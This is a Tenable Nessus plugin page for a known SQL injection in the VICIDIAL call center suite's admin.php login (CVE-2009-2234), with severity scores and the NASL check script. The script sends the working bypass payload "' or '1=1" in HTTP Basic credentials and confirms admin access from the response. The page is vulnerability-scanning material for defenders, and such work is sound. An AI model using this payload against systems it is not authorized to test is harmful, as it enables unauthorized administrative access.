Lucene search

K
nessusThis script is Copyright (C) 2009-2021 Tenable Network Security, Inc.VICIDIAL_ADMIN_SQL_INJECTION.NASL
HistoryMay 26, 2009 - 12:00 a.m.

VICIDIAL Call Center Suite admin.php SQL Injection

2009-05-2600:00:00
This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.
www.tenable.com
73

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.001

Percentile

27.8%

The remote host is running the VICIDIAL Call Center Suite, a set of programs for Asterisk that act as a complete call center suite.

The version of this software installed on the remote host fails to sanitize user-supplied input to the ‘PHP_AUTH_USER’ and ‘PHP_AUTH_PW’ variables before using it to construct database queries. Provided VICIDIAL has been configured to support use of non-Latin characters, which is not true by default, an unauthenticated attacker can exploit this issue to manipulate database queries to, for example, bypass authentication and gain administrative access.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(38889);
  script_version("1.16");

  script_cve_id("CVE-2009-2234");
  script_bugtraq_id(35056);
  script_xref(name:"EDB-ID", value:"8755");
  script_xref(name:"Secunia", value:"35325");

  script_name(english:"VICIDIAL Call Center Suite admin.php SQL Injection");
  script_summary(english:"Tries to bypass authentication");

  script_set_attribute(  attribute:"synopsis",  value:
"The remote web server contains a PHP script that is prone to a SQL
injection attack."  );
  script_set_attribute(  attribute:"description",   value:
"The remote host is running the VICIDIAL Call Center Suite, a set of
programs for Asterisk that act as a complete call center suite.

The version of this software installed on the remote host fails to
sanitize user-supplied input to the 'PHP_AUTH_USER' and 'PHP_AUTH_PW'
variables before using it to construct database queries.  Provided
VICIDIAL has been configured to support use of non-Latin characters,
which is not true by default, an unauthenticated attacker can exploit
this issue to manipulate database queries to, for example, bypass
authentication and gain administrative access."  );
  script_set_attribute(
    attribute:"see_also", 
    value:"http://www.eflo.net/VICIDIALforum/viewtopic.php?t=8075"
  );
  script_set_attribute(  attribute:"solution",   value:
"Either apply the patch security_fix_admin_20090522.patch or disable
use of non-Latin characters in VICIDIAL."  );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_cwe_id(89);
 script_set_attribute(attribute:"plugin_publication_date", value: "2009/05/26");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vicidial:call_center_suite");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);


user = "' or '1=1";
pass = "' or '1=1";


# Loop through directories.
#
# nb: I don't expect the directory will be discovered generally.
dirs = list_uniq(make_list("/vicidial", cgi_dirs()));

foreach dir (dirs)
{
  # Try to exploit the issue to bypass authentication.
  url = string(dir, "/admin.php");

  req = http_mk_get_req(
    port        : port,
    item        : url, 
    add_headers : make_array(
      'Authorization',
      string('Basic ', base64(str:user+":"+pass))
    )
  );
  res = http_send_recv_req(port:port, req:req);
  if (isnull(res)) exit(0);

  # There's a problem if we've bypassed authentication.
  if (
    'title>VICIDIAL ADMIN:' >< res[2] &&
    '/admin.php?force_logout=1">' >< res[2]
  )
  {
    if (report_verbosity > 0)
    {
      req_str = http_mk_buffer_from_req(req:req);

      report = string(
        "\n",
        "Nessus was able to verify the vulnerability exists using the following\n",
        "request :\n",
        "\n",
        crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n",
        req_str, "\n",
        crap(data:"-", length:30), " snip ", crap(data:"-", length:30), "\n"
      );
      security_warning(port:port, extra:report);
    }
    else security_warning(port);

    set_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);
    exit(0);
  }
}

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.001

Percentile

27.8%

Related for VICIDIAL_ADMIN_SQL_INJECTION.NASL